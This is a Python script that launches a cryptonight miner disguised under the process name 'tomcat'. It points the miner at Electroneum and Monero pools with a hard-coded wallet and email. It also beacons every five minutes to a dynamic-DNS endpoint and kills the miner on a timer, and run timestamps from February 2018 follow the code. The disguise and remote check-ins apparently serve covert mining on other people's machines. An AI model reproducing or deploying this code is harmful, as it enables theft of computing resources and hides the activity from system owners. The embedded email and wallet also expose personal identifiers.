import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:47:03.617152
#2018-02-17 17:34:04.255522
#2018-02-17 19:22:05.856433
#2018-02-17 21:12:05.395386
#2018-02-17 22:56:05.914772
#2018-02-18 00:43:04.521826
#2018-02-18 02:33:04.532783
#2018-02-18 04:20:06.622001
#2018-02-18 06:11:03.364196
#2018-02-18 08:00:10.336109
#2018-02-18 09:49:05.809959
#2018-02-18 11:36:05.117881
#2018-02-18 13:21:05.003218
#2018-02-18 15:11:06.731551
#2018-02-18 16:59:01.941004
#2018-02-18 18:47:05.811869
#2018-02-18 20:34:01.809367
#2018-02-18 22:20:05.496943
#2018-02-19 00:09:02.058213
#2018-02-19 01:55:07.556506
#2018-02-19 03:42:07.296559
#2018-02-19 05:26:07.561018
#2018-02-19 07:14:04.848566
#2018-02-19 09:02:07.849390
#2018-02-19 10:50:08.354735
#2018-02-19 12:39:07.549762
#2018-02-19 14:27:07.566645
#2018-02-19 16:16:10.323556
#2018-02-19 18:03:01.423810
#2018-02-19 19:51:04.134912
#2018-02-19 21:40:04.085708
#2018-02-19 23:25:08.167123
#2018-02-20 01:11:07.920127
#2018-02-20 03:01:06.261995
#2018-02-20 04:49:06.554936
#2018-02-20 06:33:05.537571
#2018-02-20 08:18:05.089238
#2018-02-20 10:03:01.521070
#2018-02-20 11:49:07.443029
#2018-02-20 13:37:02.018193
#2018-02-20 15:21:01.961977
#2018-02-20 17:06:01.664558
#2018-02-20 18:56:09.837055
#2018-02-20 20:48:02.043728
#2018-02-20 22:34:04.122732
#2018-02-21 00:17:01.348954
#2018-02-21 02:04:07.538312
#2018-02-21 03:53:04.614471
#2018-02-21 05:40:09.055996
#2018-02-21 07:28:08.117738
#2018-02-21 09:13:07.593136
#2018-02-21 11:02:05.996633
#2018-02-21 12:48:11.085781
#2018-02-21 14:37:10.196515
#2018-02-21 16:25:08.231563
#2018-02-21 18:17:09.148529
#2018-02-21 20:04:05.950896
#2018-02-21 21:53:02.213149
#2018-02-21 23:41:07.722036
#2018-02-22 01:29:06.604818
#2018-02-22 03:17:06.252943
#2018-02-22 05:03:07.804734
#2018-02-22 06:46:05.421035
#2018-02-22 08:36:06.783660
#2018-02-22 10:23:05.422110
#2018-02-22 12:10:09.586938
#2018-02-22 13:55:10.211918
#2018-02-22 15:42:10.288482
#2018-02-22 17:29:02.132142
#2018-02-22 19:17:05.037191
#2018-02-22 21:10:01.378043
#2018-02-22 22:56:01.430618
#2018-02-23 00:44:04.010918
#2018-02-23 02:32:04.754654
#2018-02-23 04:20:09.392035
#2018-02-23 06:07:05.578317
#2018-02-23 07:53:03.605632
#2018-02-23 10:10:02.512663
#2018-02-23 12:06:01.758527
#2018-02-23 13:55:10.230785
#2018-02-23 15:49:01.683401
#2018-02-23 17:36:11.980703
#2018-02-23 19:24:02.206168
#2018-02-23 21:09:01.878232
#2018-02-23 22:54:03.952969
#2018-02-24 00:41:08.884625
#2018-02-24 02:32:07.317987
#2018-02-24 04:25:08.073693
#2018-02-24 06:12:06.909793
#2018-02-24 07:59:06.379297
#2018-02-24 09:43:05.311242
#2018-02-24 11:38:06.699102
#2018-02-24 13:28:07.639224
#2018-02-24 15:17:01.938105
#2018-02-24 17:06:01.766686
#2018-02-24 18:57:06.060666
#2018-02-24 20:44:07.483195
#2018-02-24 22:57:06.103349
#2018-02-25 02:14:03.911749
#2018-02-25 05:34:04.775039
#2018-02-25 11:34:01.993798